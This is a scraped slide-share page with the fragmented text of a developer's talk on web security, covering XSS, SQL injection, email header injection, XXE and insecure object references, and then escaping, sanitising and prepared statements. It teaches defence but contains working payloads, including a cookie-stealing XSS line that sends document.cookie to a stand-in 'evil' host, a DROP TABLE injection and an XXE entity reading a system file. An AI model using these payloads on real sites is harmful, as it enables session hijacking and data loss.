ayesh karunaratne
play

Ayesh Karunaratne Freelance Software Developer Kandy, Sri Lanka - - PowerPoint PPT Presentation

Jan 01, 2023 •357 likes •1.42k views

Ayesh Karunaratne Freelance Software Developer Kandy, Sri Lanka - Everywhere https://ayesh.me Ayesh @Ayeshlive Ayesh <form> <input name="query" /> <input type="submit" /> </form> var query =

  4. Ayesh Karunaratne Freelance Software Developer Kandy, Sri Lanka - Everywhere https://ayesh.me Ayesh @Ayeshlive Ayesh

  19. <form> <input name="query" /> <input type="submit" /> </form> var query = req.params.query

  20. var query = req.params.query; document.write('Search results for "' + query + '"');

  21. var query = req.params.query; document.write('Search results for "' + query + '"');

  22. var query = req.params.query; document.write('Search results for "' + query + '"');

  23. var query = req.params.query; document.write('Search results for "' + query + '"');

  24. var query = req.params.query; document.write('Search results for "' + query + '"');

  25. var query = req.params.query; document.write('Search results for "' + query + '"');

  26. <script>document.cookie</script> var query = req.params.query; document.write('Search results for "' + query + '"');

  27. var query = req.params.query; document.write('Search results for "' + query + '"');

  28. this.src='http://evil/?c='+document.cookie var query = req.params.query; document.write('Search results for "' + query + '"');

  29. this.src='http://evil/?c='+document.cookie var query = req.params.query; document.write('Search results for "' + query + '"');

  30. this.src='http://evil/?c='+document.cookie var query = req.params.query; document.write('Search results for "' + query + '"'); https://site.noob/?query=Ayesh+%3Cimg+src%3Dx+onerror%3Dthis.src%3D%27http%3A%2F%2F evil%2F%3Fc%3D%27%2Bdocument.cookie%3E

  31. <form> <input name="query" /> <input type="submit" /> </form> $query = $_GET['query'];

  32. <?php query( " SELECT * FROM posts WHERE title = '$query' "); ?>

  33. <?php query( " SELECT * SELECT * FROM posts FROM posts WHERE WHERE title = '$query' title = ' ' "); ?>

  34. <?php query( " SELECT * SELECT * FROM posts FROM posts WHERE WHERE title = '$query' title = ' ' "); ?>

  35. <?php query( SELECT * " SELECT * FROM posts FROM posts WHERE WHERE title = 'Ayesh ' s talk is great title = '$query' "); ?>

  36. <?php query( SELECT * " SELECT * FROM posts FROM posts WHERE WHERE title = 'Ayesh' ; DROP TABLE posts title = '$query' "); ?>

  37. SELECT * FROM posts WHERE title = 'Ayesh' ; DROP TABLE posts

  39. <form> <input name="query" /> <input type="submit" /> </form> $query = $_GET['query'];

  40. $query = $_GET['query']; From: Site <tracking@site.noob> To: site-owner@aol.com Subject: Search alert for $query

  41. $query = $_GET['query']; From: Site <tracking@site.noob> From: Site tracking @ site . noob To: site-owner@aol.com To: site-owner@aol.com Subject: Search alert for $query Subject: Search alert for how did i accidentally build a shelf

  42. \r\n $query = $_GET['query']; From: Site <tracking@site.noob> From: Site tracking @ site . noob To: site-owner@aol.com To: site-owner@aol.com Subject: Search alert for $query Subject: Search alert for how did i accidentally build a shelf Reply-To: evil@evil.com

  46. • • • • • • • • • • •

  55. ( ノ ° Д ° )ノ ︵ ┻━┻

  57. example@example.com Example-example

  58. How to <script>alert(‘ xss ’);</script> How to How to <script>alert(‘ xss ’);</script> How to alert(‘ xss ’); my-awesome-song-*****.mp3 my-awesome-song- _____ .mp3 my-class>your-class my-class_your-class

  60. Ayesh’s talk is <script>alert(“Oops!”)</script> Ayesh’s talk is &lt;script&gt;alert (“Oops!”)& lt;/script&gt; Ayesh’s talk is < script > alert(“Oops!”) < /script>

  61. <?php query( " SELECT * FROM posts WHERE title = %title ", $query); ?>

  62. <?php query( SELECT * " SELECT * FROM posts FROM posts WHERE WHERE title = 'Ayesh\'; DROP TABLE posts ' title = %title ", $query); ?>

  64. filter_var('foo@bar.com', FILTER_VALIDATE_EMAIL); is_email('foo@bar.com'); var validator = require('validator ’ ); validator.isEmail('foo@bar.com'); valid_email_address('foo@bar.com'); <field name="email" type="text" validate="email" />

  65. filter_var(); var validator = require('validator ’ );

  66. filter_var( ‘###foo@bar.com' , FILTER_SANITIZE_EMAIL); sanitize_email( ‘ foo@bar.com ' );

  67. filter_var();

  68. filter_var('test <script>alert("xss");</script>', FILTER_SANITIZE_FULL_SPECIAL_CHARS); htmlspecialchars('test <script>alert("xss");</script>', ENT_QUOTES, 'UTF-8'); esc_html('test <script>alert("xss");</script >’ ); var validator = require('validator ’ ); validator.isEmail('foo@bar.com'); check_plain('test <script>alert("xss");</script>'); <field name="email" type="text" validate="email" />

  70. $stmt = $pdo->prepare("SELECT * FROM posts WHERE title = :title"); $stmt->execute(['title' => $query]); $post = $stmt->fetch(); $post = $wpdb->query( $wpdb->prepare( "SELECT * FROM posts WHERE title = '%s'",$query )); $query = $connection->query( “ SELECT * FROM posts WHERE title = :title", [':title' =>$query]);

  73. SELECT * FROM posts WHERE title = 'Ayesh' ; DROP TABLE posts

  74. <script>document.cookie</script> var query = req.params.query; document.write('Search results for "' + query + '"');

  76. • •

  77. https://site.noob/user/796148

  78. https://site.noob/user/796148/edit

  79. https://site.noob/user/23453

  80. https://site.noob/user/23453/edit

  81. • • • • •

  82. • • • • •

  88. { name: "Tobias", age: "26", } {name: "Tobias", age: 26} array ( 'name' => 'Tobias’ , 'age' => 26 );

  89. { name: “ Nadine", age: "26", } {name: “ Nadine", age: 26} array ( 'name' => ‘Nadine’ , 'age' => 26 );

  91. • • • •

  92. <? xml version="1.0" encoding="ISO-8859-1"?> <! DOCTYPE foo [ <! ELEMENT foo ANY > <! ENTITY xxe SYSTEM "file: // /etc/password" >]><foo>&xxe;</foo>

  93. • • • • • • •

  94. • • • • • • •

  95. • • • • • • •

  96. • • • • composer update

  97. • • • • composer update

  98. • • • • •

  99. • • • • •

  100. • • • • • • • • • •

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

TGA considerations for preclinical studies of cell therapy products Asanka Karunaratne, PhD

TGA considerations for preclinical studies of cell therapy products Asanka Karunaratne, PhD

TGA considerations for preclinical studies of cell therapy products Asanka Karunaratne, PhD Toxicologist Toxicology Section Scientific Evaluation Branch 22 July 2016 Cell therapy is a broad field: Large range of

670 views • 26 slides
Stitch: Fusible Heterogeneous Accelerators Enmeshed with Many-Core Architecture for Wearables

Stitch: Fusible Heterogeneous Accelerators Enmeshed with Many-Core Architecture for Wearables

Stitch: Fusible Heterogeneous Accelerators Enmeshed with Many-Core Architecture for Wearables Cheng Tan , Manupa Karunaratne, Tulika Mitra, Li-Shiuan Peh Emerging Wearables Software programmable to support diverse applications Here Maps on

764 views • 47 slides
The importance of being a noob (not a tech talk) Luka Kladaric hello@luka.io @kll

The importance of being a noob (not a tech talk) Luka Kladaric hello@luka.io @kll

The importance of being a noob (not a tech talk) Luka Kladaric hello@luka.io @kll http://speakerscore.com/luka 1 who am I? http://speakerscore.com/luka 2 3 civil service &amp; first job Faculty of Mechanical Engineering and Naval

173 views • 13 slides
Why the Social Dimension of Europe 2020 is an Oxymoron Bart Vanhercke Co-Director,

Why the Social Dimension of Europe 2020 is an Oxymoron Bart Vanhercke Co-Director,

SEK Trade Union School 2011 The EU2020 strategy and Economic Governance Nicosia, 19 20 September 2011 Why the Social Dimension of Europe 2020 is an Oxymoron Bart Vanhercke Co-Director, European Social Observatory (OSE) Associate

525 views • 49 slides
Computing Node Polynomials for Plane Curves Florian Block University of Michigan FPSAC 2010

Computing Node Polynomials for Plane Curves Florian Block University of Michigan FPSAC 2010

Computing Node Polynomials for Plane Curves Florian Block University of Michigan FPSAC 2010 August 5, 2010 http://www-personal.umich.edu/ blockf/NodePolyTalk.pdf arXiv:1006.0218 Florian Block (U of Michigan) Computing Node Polynomials

411 views • 16 slides
Minimal k -partition for the p -norm of the eigenvalues V. Bonnaillie-No el DMA, CNRS, ENS

Minimal k -partition for the p -norm of the eigenvalues V. Bonnaillie-No el DMA, CNRS, ENS

Definition 2-partition Properties 3-partition k -partitions Conclusion Minimal k -partition for the p -norm of the eigenvalues V. Bonnaillie-No el DMA, CNRS, ENS Paris joint work with B. Bogosel, B. Helffer, C. L ena, G. Vial Calculus

527 views • 50 slides
Build a Mini-Amazon-Go in 1 Day Nov 2019 Zhi Zhang, Rachel Hu Amazon AI d2l.ai Outline

Build a Mini-Amazon-Go in 1 Day Nov 2019 Zhi Zhang, Rachel Hu Amazon AI d2l.ai Outline

Build a Mini-Amazon-Go in 1 Day Nov 2019 Zhi Zhang, Rachel Hu Amazon AI d2l.ai Outline Initiate the work-horse(SageMaker notebook) Showcase a demo from the noob Sampling real-world data Hello world for object labeling

279 views • 12 slides
How to Speak at a Conference Beth Tucker Long @e3betht Who am I? Beth Tucker Long PHP

How to Speak at a Conference Beth Tucker Long @e3betht Who am I? Beth Tucker Long PHP

How to Speak at a Conference Beth Tucker Long @e3betht Who am I? Beth Tucker Long PHP Developer Stay-at-home mom User group leader Mentor &amp; Apprentice e3betht Audience Participation? Completely fine. Ask me

407 views • 39 slides
Embedded Device Cryptography in the Field Introduction Motivation State of Affairs Coping

Embedded Device Cryptography in the Field Introduction Motivation State of Affairs Coping

Embedded Device Cryptography in the Field Embedded Device Cryptography in the Field Introduction Motivation State of Affairs Coping Mechanisms Indefensible Alex Kropivny Local Attacks Trust Relationships Use Cases Factory Testing

699 views • 49 slides
Kolla Project onboarding Mark Goddard | mgoddard | Kolla Train PTL What does Kolla do?

Kolla Project onboarding Mark Goddard | mgoddard | Kolla Train PTL What does Kolla do?

30.04.2019 Kolla Project onboarding Mark Goddard | mgoddard | Kolla Train PTL What does Kolla do? Kollas mission is to provide production-ready containers and deployment tools for operating OpenStack clouds. Project background Founded

958 views • 61 slides
Let Me Know: A Dialogue For Notifications Project Pitch CS294S Fall 2020 Goal: Event-based

Let Me Know: A Dialogue For Notifications Project Pitch CS294S Fall 2020 Goal: Event-based

Let Me Know: A Dialogue For Notifications Project Pitch CS294S Fall 2020 Goal: Event-based Notifications Notifications are useful across many domains Let me know if it will rain tomorrow Let me know if Juventus wins

283 views • 7 slides
Nova versioned notifications The result of a 3-year journey balazs.gibizer@ericsson.com Agenda

Nova versioned notifications The result of a 3-year journey balazs.gibizer@ericsson.com Agenda

Nova versioned notifications The result of a 3-year journey balazs.gibizer@ericsson.com Agenda My new use case The need to overhaul Novas notification interface The journey It is Done so it is DEMO time! Is there

252 views • 14 slides
Implementation of Epidemic Routing with IP Convergence Layer in ns-3 Dr. Justin P. Rohrer and Lt.

Implementation of Epidemic Routing with IP Convergence Layer in ns-3 Dr. Justin P. Rohrer and Lt.

Implementation of Epidemic Routing with IP Convergence Layer in ns-3 Dr. Justin P. Rohrer and Lt. Andrew N. Mauldin jprohrer@nps.edu Naval Postgraduate School TaNCAD Lab ( https://tancad.net ) WNS3, June 13, 2018 Abstract Implementation of

774 views • 55 slides
Responses Immediately after the Accident Outline of the Accident Responses by Tokyo Electric

Responses Immediately after the Accident Outline of the Accident Responses by Tokyo Electric

Responses Immediately after the Accident Outline of the Accident Responses by Tokyo Electric Power Company Responses by the national government Time Event (TEPCO) (Nuclear and Industrial Safety Agency) The government established the

210 views • 4 slides
Big Picture Semantics how do we figure out the situations in which sentences are true or

Big Picture Semantics how do we figure out the situations in which sentences are true or

Big Picture Semantics how do we figure out the situations in which sentences are true or false? Compositionality = pieces + composing them Lexical semantics = what do we know about word meanings? Compositional semantics = how do we

419 views • 38 slides
Improving coreference resolution with automatically predicted prosodic information Ina R

Improving coreference resolution with automatically predicted prosodic information Ina R

Improving coreference resolution with automatically predicted prosodic information Ina R osiger, Sabrina Stehwien Arndt Riester, Thang Vu University of Stuttgart Institute for Natural Language Processing (IMS) September 07, 2017

395 views • 21 slides
Evaluating Compiler Support for Complexity Effective Network Processing Pradeep Rao and S.K.

Evaluating Compiler Support for Complexity Effective Network Processing Pradeep Rao and S.K.

Evaluating Compiler Support for Complexity Effective Network Processing Pradeep Rao and S.K. Nandy Computer Aided Design Laboratory. SERC, Indian Institute of Science. pradeep,nandy@cadl.iisc.ernet.in http://www.serc.iisc.ernet.in/cadl/ 7 th

309 views • 19 slides
Analysis of the Binary IV Model or The case of the missing 9 dimensions Thomas Richardson

Analysis of the Binary IV Model or The case of the missing 9 dimensions Thomas Richardson

Analysis of the Binary IV Model or The case of the missing 9 dimensions Thomas Richardson Department of Statistics University of Washington This is joint work with James Robins (Harvard). Outline 1. The binary IV potential outcomes model

156 views • 15 slides
Tom Lord DUNE Prism Meeting 9 th January 2020 OA Distance Reduction? Can the OA distance

Tom Lord DUNE Prism Meeting 9 th January 2020 OA Distance Reduction? Can the OA distance

Beam Options for DUNE-Prism Tom Lord DUNE Prism Meeting 9 th January 2020 OA Distance Reduction? Can the OA distance required be for reduced with a few extra HC fluxes? Can we remove requirement for middle-distance OA measurements?

491 views • 45 slides
A Representation Theorem for Reasoning in First-Order Multi-Agent Knowledge Bases Christoph

A Representation Theorem for Reasoning in First-Order Multi-Agent Knowledge Bases Christoph

A Representation Theorem for Reasoning in First-Order Multi-Agent Knowledge Bases Christoph Schwering Christoph Schwering Christoph Schwering Christoph Schwering Christoph Schwering Christoph Schwering Christoph Schwering Christoph

628 views • 26 slides
Commissioning of high precision in situ measurements of N 2 O and CO at Cape Grim CSIRO CLIMATE

Commissioning of high precision in situ measurements of N 2 O and CO at Cape Grim CSIRO CLIMATE

Commissioning of high precision in situ measurements of N 2 O and CO at Cape Grim CSIRO CLIMATE SCIENCE CENTRE Zo Loh, Paul Krummel, Elise-Andree Guerette, Darren Spencer and Ray Langenfelds Quick Outline Description of instrument + set-up

416 views • 16 slides
Java I/O For the next couple of classes we will be Java I/O talking about Java I/O Last

Java I/O For the next couple of classes we will be Java I/O talking about Java I/O Last

Java I/O For the next couple of classes we will be Java I/O talking about Java I/O Last class: basics and low level I/O This class: wrappers and high level I/O Reading, Writing, and stuff Pt II All Java I/O classes

251 views • 8 slides
Interval Reachability Analysis using Second-Order Sensitivity Pierre-Jean Meyer , Murat Arcak

Interval Reachability Analysis using Second-Order Sensitivity Pierre-Jean Meyer , Murat Arcak

Interval Reachability Analysis using Second-Order Sensitivity Pierre-Jean Meyer , Murat Arcak IFAC 2020 Pierre-Jean Meyer (UC Berkeley) Interval Reachability Analysis using Second-Order Sensitivity IFAC 2020 1 / 12 Reachability analysis

170 views • 12 slides
Sensitivity of T2HKK to non-standard interaction Monojit Ghosh Tokyo Metropolitan University

Sensitivity of T2HKK to non-standard interaction Monojit Ghosh Tokyo Metropolitan University

Sensitivity of T2HKK to non-standard interaction Monojit Ghosh Tokyo Metropolitan University Tokyo, Japan 1st Workshop on 2nd HK Detector in Korea Seoul National University, Seoul, Korea November 21-22, 2016 Based on: Fukasawa, Ghosh,

642 views • 15 slides

More recommend